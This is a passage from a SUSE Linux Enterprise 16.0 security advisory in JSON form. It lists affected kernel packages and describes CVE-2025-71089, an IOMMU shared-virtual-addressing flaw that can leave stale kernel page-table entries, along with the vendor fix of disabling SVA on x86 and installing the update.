"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
